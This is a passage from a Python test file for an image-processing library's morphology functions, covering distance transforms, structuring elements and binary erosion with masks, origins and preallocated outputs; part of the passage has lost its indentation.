                data, return_indices=True)
            dts.append(dt)
            fts.append(ft)
            # preallocated distances, returned indices
            dt = numpy.zeros(data.shape, dtype=numpy.int32)
            ft = ndimage.distance_transform_cdt(
                data, distances=dt, return_indices=True)
            dts.append(dt)
            fts.append(ft)
            # returned distances, preallocated indices
            ft = numpy.indices(data.shape, dtype=numpy.int32)
            dt = ndimage.distance_transform_cdt(
                data, return_indices=True, indices=ft)
            dts.append(dt)
            fts.append(ft)
            # both preallocated
            dt = numpy.zeros(data.shape, dtype=numpy.int32)
            ft = numpy.indices(data.shape, dtype=numpy.int32)
            ndimage.distance_transform_cdt(data, distances=dt,
                                           return_indices=True, indices=ft)
            dts.append(dt)
            fts.append(ft)
            for dt in dts:
                assert_array_almost_equal(tdt, dt)
            for ft in fts:
                assert_array_almost_equal(tft, ft)
    def test_distance_transform_edt01(self):
        # euclidean distance transform (edt)
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out, ft = ndimage.distance_transform_edt(data, return_indices=True)
            # distances must agree with the brute-force euclidean transform
            bf = ndimage.distance_transform_bf(data, 'euclidean')
            assert_array_almost_equal(bf, out)
            # recompute the distances from the returned index arrays: the
            # per-element euclidean norm of (ft - own index) must equal bf
            dt = ft - numpy.indices(ft.shape[1:], dtype=ft.dtype)
            dt = dt.astype(numpy.float64)
            numpy.multiply(dt, dt, dt)
            dt = numpy.add.reduce(dt, axis=0)
            numpy.sqrt(dt, dt)
            assert_array_almost_equal(bf, dt)
    def test_distance_transform_edt02(self):
        # every combination of returned vs. preallocated distances/indices
        # must agree with the plain return_indices=True reference result
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            # reference distances and feature-transform indices
            tdt, tft = ndimage.distance_transform_edt(data, return_indices=True)
            dts = []
            fts = []
            # distances written into a preallocated array
            dt = numpy.zeros(data.shape, dtype=numpy.float64)
            ndimage.distance_transform_edt(data, distances=dt)
            dts.append(dt)
            # indices only, returned
            ft = ndimage.distance_transform_edt(
                data, return_distances=0, return_indices=True)
            fts.append(ft)
            # indices only, written into a preallocated array
            ft = numpy.indices(data.shape, dtype=numpy.int32)
            ndimage.distance_transform_edt(
                data, return_distances=False, return_indices=True, indices=ft)
            fts.append(ft)
            # both returned
            dt, ft = ndimage.distance_transform_edt(
                data, return_indices=True)
            dts.append(dt)
            fts.append(ft)
            # preallocated distances, returned indices
            dt = numpy.zeros(data.shape, dtype=numpy.float64)
            ft = ndimage.distance_transform_edt(
                data, distances=dt, return_indices=True)
            dts.append(dt)
            fts.append(ft)
            # returned distances, preallocated indices
            ft = numpy.indices(data.shape, dtype=numpy.int32)
            dt = ndimage.distance_transform_edt(
                data, return_indices=True, indices=ft)
            dts.append(dt)
            fts.append(ft)
            # both preallocated
            dt = numpy.zeros(data.shape, dtype=numpy.float64)
            ft = numpy.indices(data.shape, dtype=numpy.int32)
            ndimage.distance_transform_edt(
                data, distances=dt, return_indices=True, indices=ft)
            dts.append(dt)
            fts.append(ft)
            for dt in dts:
                assert_array_almost_equal(tdt, dt)
            for ft in fts:
                assert_array_almost_equal(tft, ft)
    def test_distance_transform_edt03(self):
        # uniform sampling=[2, 2]: edt must agree with the brute-force result
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            ref = ndimage.distance_transform_bf(data, 'euclidean', sampling=[2, 2])
            out = ndimage.distance_transform_edt(data, sampling=[2, 2])
            assert_array_almost_equal(ref, out)
    def test_distance_transform_edt4(self):
        # anisotropic sampling=[2, 1]: edt must agree with the brute-force result
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            ref = ndimage.distance_transform_bf(data, 'euclidean', sampling=[2, 1])
            out = ndimage.distance_transform_edt(data, sampling=[2, 1])
            assert_array_almost_equal(ref, out)
def test_distance_transform_edt5(self):
# Ticket #954 regression test
out = ndimage.distance_transform_edt(False)
assert_array_almost_equal(out, [0.])
def test_generate_structure01(self):
struct = ndimage.generate_binary_structure(0, 1)
assert_array_almost_equal(struct, 1)
def test_generate_structure02(self):
struct = ndimage.generate_binary_structure(1, 1)
assert_array_almost_equal(struct, [1, 1, 1])
def test_generate_structure03(self):
struct = ndimage.generate_binary_structure(2, 1)
assert_array_almost_equal(struct, [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]])
def test_generate_structure04(self):
struct = ndimage.generate_binary_structure(2, 2)
assert_array_almost_equal(struct, [[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
def test_iterate_structure01(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
out = ndimage.iterate_structure(struct, 2)
assert_array_almost_equal(out, [[0, 0, 1, 0, 0],
[0, 1, 1, 1, 0],
[1, 1, 1, 1, 1],
[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0]])
def test_iterate_structure02(self):
struct = [[0, 1],
[1, 1],
[0, 1]]
out = ndimage.iterate_structure(struct, 2)
assert_array_almost_equal(out, [[0, 0, 1],
[0, 1, 1],
[1, 1, 1],
[0, 1, 1],
[0, 0, 1]])
def test_iterate_structure03(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
out = ndimage.iterate_structure(struct, 2, 1)
expected = [[0, 0, 1, 0, 0],
[0, 1, 1, 1, 0],
[1, 1, 1, 1, 1],
[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0]]
assert_array_almost_equal(out[0], expected)
assert_equal(out[1], [2, 2])
def test_binary_erosion01(self):
for type_ in self.types:
data = numpy.ones([], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, 1)
def test_binary_erosion02(self):
for type_ in self.types:
data = numpy.ones([], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, 1)
def test_binary_erosion03(self):
for type_ in self.types:
data = numpy.ones([1], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [0])
def test_binary_erosion04(self):
for type_ in self.types:
data = numpy.ones([1], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [1])
def test_binary_erosion05(self):
for type_ in self.types:
data = numpy.ones([3], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [0, 1, 0])
def test_binary_erosion06(self):
for type_ in self.types:
data = numpy.ones([3], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [1, 1, 1])
def test_binary_erosion07(self):
for type_ in self.types:
data = numpy.ones([5], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [0, 1, 1, 1, 0])
def test_binary_erosion08(self):
for type_ in self.types:
data = numpy.ones([5], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [1, 1, 1, 1, 1])
def test_binary_erosion09(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [0, 0, 0, 0, 0])
def test_binary_erosion10(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [1, 0, 0, 0, 1])
def test_binary_erosion11(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
struct = [1, 0, 1]
out = ndimage.binary_erosion(data, struct, border_value=1)
assert_array_almost_equal(out, [1, 0, 1, 0, 1])
def test_binary_erosion12(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
struct = [1, 0, 1]
out = ndimage.binary_erosion(data, struct, border_value=1,
origin=-1)
assert_array_almost_equal(out, [0, 1, 0, 1, 1])
def test_binary_erosion13(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
struct = [1, 0, 1]
out = ndimage.binary_erosion(data, struct, border_value=1,
origin=1)
assert_array_almost_equal(out, [1, 1, 0, 1, 0])
def test_binary_erosion14(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
struct = [1, 1]
out = ndimage.binary_erosion(data, struct, border_value=1)
assert_array_almost_equal(out, [1, 1, 0, 0, 1])
def test_binary_erosion15(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
struct = [1, 1]
out = ndimage.binary_erosion(data, struct, border_value=1,
origin=-1)
assert_array_almost_equal(out, [1, 0, 0, 1, 1])
def test_binary_erosion16(self):
for type_ in self.types:
data = numpy.ones([1, 1], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [[1]])
def test_binary_erosion17(self):
for type_ in self.types:
data = numpy.ones([1, 1], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [[0]])
def test_binary_erosion18(self):
for type_ in self.types:
data = numpy.ones([1, 3], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [[0, 0, 0]])
def test_binary_erosion19(self):
for type_ in self.types:
data = numpy.ones([1, 3], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [[1, 1, 1]])
def test_binary_erosion20(self):
for type_ in self.types:
data = numpy.ones([3, 3], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [[0, 0, 0],
[0, 1, 0],
[0, 0, 0]])
def test_binary_erosion21(self):
for type_ in self.types:
data = numpy.ones([3, 3], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
    def test_binary_erosion22(self):
        """Default (cross) erosion of an 8x8 pattern, border_value=1,
        checked against a hand-computed fixture for every supported dtype."""
        expected = [[0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 1, 0, 0],
                    [0, 0, 0, 1, 1, 0, 0, 0],
                    [0, 0, 1, 0, 0, 1, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 1, 1],
                                [0, 0, 1, 1, 1, 1, 1, 1],
                                [0, 0, 1, 1, 1, 1, 0, 0],
                                [0, 1, 1, 1, 1, 1, 1, 0],
                                [0, 1, 1, 0, 0, 1, 1, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_erosion(data, border_value=1)
            assert_array_almost_equal(out, expected)
    def test_binary_erosion23(self):
        """Erosion with the full 3x3 (connectivity-2) structure, border_value=1,
        checked against a hand-computed fixture for every supported dtype."""
        struct = ndimage.generate_binary_structure(2, 2)
        expected = [[0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 1, 1, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 1, 1],
                                [0, 0, 1, 1, 1, 1, 1, 1],
                                [0, 0, 1, 1, 1, 1, 0, 0],
                                [0, 1, 1, 1, 1, 1, 1, 0],
                                [0, 1, 1, 0, 0, 1, 1, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_erosion(data, struct, border_value=1)
            assert_array_almost_equal(out, expected)
    def test_binary_erosion24(self):
        """Erosion with an asymmetric 2x2 structure, border_value=1,
        checked against a hand-computed fixture for every supported dtype."""
        struct = [[0, 1],
                  [1, 1]]
        expected = [[0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 1, 1, 1],
                    [0, 0, 0, 1, 1, 1, 0, 0],
                    [0, 0, 1, 1, 1, 1, 0, 0],
                    [0, 0, 1, 0, 0, 0, 1, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 1, 1],
                                [0, 0, 1, 1, 1, 1, 1, 1],
                                [0, 0, 1, 1, 1, 1, 0, 0],
                                [0, 1, 1, 1, 1, 1, 1, 0],
                                [0, 1, 1, 0, 0, 1, 1, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_erosion(data, struct, border_value=1)
            assert_array_almost_equal(out, expected)
    def test_binary_erosion25(self):
        """Erosion with a hollow-centre (diamond without middle) structure,
        border_value=1, checked against a hand-computed fixture per dtype."""
        struct = [[0, 1, 0],
                  [1, 0, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 1, 0, 0],
                    [0, 0, 0, 1, 0, 0, 0, 0],
                    [0, 0, 1, 0, 0, 1, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 1, 1],
                                [0, 0, 1, 1, 1, 0, 1, 1],
                                [0, 0, 1, 0, 1, 1, 0, 0],
                                [0, 1, 0, 1, 1, 1, 1, 0],
                                [0, 1, 1, 0, 0, 1, 1, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_erosion(data, struct, border_value=1)
            assert_array_almost_equal(out, expected)
    def test_binary_erosion26(self):
        """Same hollow-centre structure as test_binary_erosion25 but with
        origin=(-1, -1): the fixture is the previous result shifted."""
        struct = [[0, 1, 0],
                  [1, 0, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 1],
                    [0, 0, 0, 0, 1, 0, 0, 1],
                    [0, 0, 1, 0, 0, 0, 0, 0],
                    [0, 1, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 1]]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 1, 1],
                                [0, 0, 1, 1, 1, 0, 1, 1],
                                [0, 0, 1, 0, 1, 1, 0, 0],
                                [0, 1, 0, 1, 1, 1, 1, 0],
                                [0, 1, 1, 0, 0, 1, 1, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_erosion(data, struct, border_value=1,
                                         origin=(-1, -1))
            assert_array_almost_equal(out, expected)
    def test_binary_erosion27(self):
        """Two iterations of diamond erosion shrink a diamond to its centre;
        result returned as a new array."""
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0]], bool)
        out = ndimage.binary_erosion(data, struct, border_value=1,
                                     iterations=2)
        assert_array_almost_equal(out, expected)
    def test_binary_erosion28(self):
        """Same scenario as test_binary_erosion27 but writing into a
        caller-provided output array."""
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0]], bool)
        out = numpy.zeros(data.shape, bool)
        ndimage.binary_erosion(data, struct, border_value=1,
                               iterations=2, output=out)
        assert_array_almost_equal(out, expected)
    def test_binary_erosion29(self):
        """Three iterations of diamond erosion shrink a larger diamond to
        its centre pixel."""
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [1, 1, 1, 1, 1, 1, 1],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0]], bool)
        out = ndimage.binary_erosion(data, struct,
                                     border_value=1, iterations=3)
        assert_array_almost_equal(out, expected)
    def test_binary_erosion30(self):
        """Same as test_binary_erosion29 with a provided output array, and
        additionally with output aliasing the input (memory overlap)."""
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [1, 1, 1, 1, 1, 1, 1],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0]], bool)
        out = numpy.zeros(data.shape, bool)
        ndimage.binary_erosion(data, struct, border_value=1,
                               iterations=3, output=out)
        assert_array_almost_equal(out, expected)
        # test with output memory overlap
        ndimage.binary_erosion(data, struct, border_value=1,
                               iterations=3, output=data)
        assert_array_almost_equal(data, expected)
    def test_binary_erosion31(self):
        """Single iteration of diamond erosion with origin=(-1, -1) into a
        provided output array; fixture is the shifted erosion result."""
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 1, 0, 0, 0, 0],
                    [0, 1, 1, 1, 0, 0, 0],
                    [1, 1, 1, 1, 1, 0, 1],
                    [0, 1, 1, 1, 0, 0, 0],
                    [0, 0, 1, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 1, 0, 0, 0, 1]]
        data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [1, 1, 1, 1, 1, 1, 1],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0]], bool)
        out = numpy.zeros(data.shape, bool)
        ndimage.binary_erosion(data, struct, border_value=1,
                               iterations=1, output=out, origin=(-1, -1))
        assert_array_almost_equal(out, expected)
    def test_binary_erosion32(self):
        """Two iterations of diamond erosion shrink a diamond to its centre.

        NOTE(review): this is identical to test_binary_erosion27 (same
        struct, data, call and fixture) — possibly a duplicated case.
        """
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0]], bool)
        out = ndimage.binary_erosion(data, struct,
                                     border_value=1, iterations=2)
        assert_array_almost_equal(out, expected)
    def test_binary_erosion33(self):
        """Erosion to convergence (iterations=-1) restricted by a mask:
        only pixels where mask is zero keep their input value."""
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 0, 0, 0, 1, 1],
                    [0, 0, 0, 0, 0, 0, 1],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0]]
        mask = [[1, 1, 1, 1, 1, 0, 0],
                [1, 1, 1, 1, 1, 1, 0],
                [1, 1, 1, 1, 1, 1, 1],
                [1, 1, 1, 1, 1, 1, 1],
                [1, 1, 1, 1, 1, 1, 1],
                [1, 1, 1, 1, 1, 1, 1],
                [1, 1, 1, 1, 1, 1, 1]]
        data = numpy.array([[0, 0, 0, 0, 0, 1, 1],
                            [0, 0, 0, 1, 0, 0, 1],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0]], bool)
        out = ndimage.binary_erosion(data, struct,
                                     border_value=1, mask=mask, iterations=-1)
        assert_array_almost_equal(out, expected)
    def test_binary_erosion34(self):
        """Single-pass masked erosion: the masked ring erodes while the
        unmasked remainder of the cross is passed through unchanged."""
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 1, 0, 0, 0],
                    [0, 1, 1, 1, 1, 1, 0],
                    [0, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0]]
        mask = [[0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0],
                [0, 0, 1, 1, 1, 0, 0],
                [0, 0, 1, 0, 1, 0, 0],
                [0, 0, 1, 1, 1, 0, 0],
                [0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0]], bool)
        out = ndimage.binary_erosion(data, struct,
                                     border_value=1, mask=mask)
        assert_array_almost_equal(out, expected)
    def test_binary_erosion35(self):
        """Masked erosion with origin=(-1, -1) and a provided output array.

        The fixture is built from the unmasked shifted-erosion result (tmp)
        combined with the original data outside the mask.
        """
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        mask = [[0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0],
                [0, 0, 1, 1, 1, 0, 0],
                [0, 0, 1, 0, 1, 0, 0],
                [0, 0, 1, 1, 1, 0, 0],
                [0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [1, 1, 1, 1, 1, 1, 1],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0]], bool)
        # tmp is the expected result of the same erosion without a mask.
        tmp = [[0, 0, 1, 0, 0, 0, 0],
               [0, 1, 1, 1, 0, 0, 0],
               [1, 1, 1, 1, 1, 0, 1],
               [0, 1, 1, 1, 0, 0, 0],
               [0, 0, 1, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0],
               [0, 0, 1, 0, 0, 0, 1]]
        expected = numpy.logical_and(tmp, mask)
        tmp = numpy.logical_and(data, numpy.logical_not(mask))
        expected = numpy.logical_or(expected, tmp)
        out = numpy.zeros(data.shape, bool)
        ndimage.binary_erosion(data, struct, border_value=1,
                               iterations=1, output=out,
                               origin=(-1, -1), mask=mask)
        assert_array_almost_equal(out, expected)
    def test_binary_erosion36(self):
        """Masked erosion with a hollow-centre structure and origin=(-1, -1).

        As in test_binary_erosion35, the fixture merges the unmasked
        erosion result (tmp) inside the mask with the raw data outside it.
        """
        struct = [[0, 1, 0],
                  [1, 0, 1],
                  [0, 1, 0]]
        mask = [[0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 1, 1, 1, 0, 0, 0],
                [0, 0, 1, 0, 1, 0, 0, 0],
                [0, 0, 1, 1, 1, 0, 0, 0],
                [0, 0, 1, 1, 1, 0, 0, 0],
                [0, 0, 1, 1, 1, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0]]
        # tmp is the expected result of the same erosion without a mask.
        tmp = [[0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 1],
               [0, 0, 0, 0, 1, 0, 0, 1],
               [0, 0, 1, 0, 0, 0, 0, 0],
               [0, 1, 0, 0, 1, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 0],
               [0, 0, 0, 0, 0, 0, 0, 1]]
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 1, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 1, 1, 1],
                            [0, 0, 1, 1, 1, 0, 1, 1],
                            [0, 0, 1, 0, 1, 1, 0, 0],
                            [0, 1, 0, 1, 1, 1, 1, 0],
                            [0, 1, 1, 0, 0, 1, 1, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0]])
        expected = numpy.logical_and(tmp, mask)
        tmp = numpy.logical_and(data, numpy.logical_not(mask))
        expected = numpy.logical_or(expected, tmp)
        out = ndimage.binary_erosion(data, struct, mask=mask,
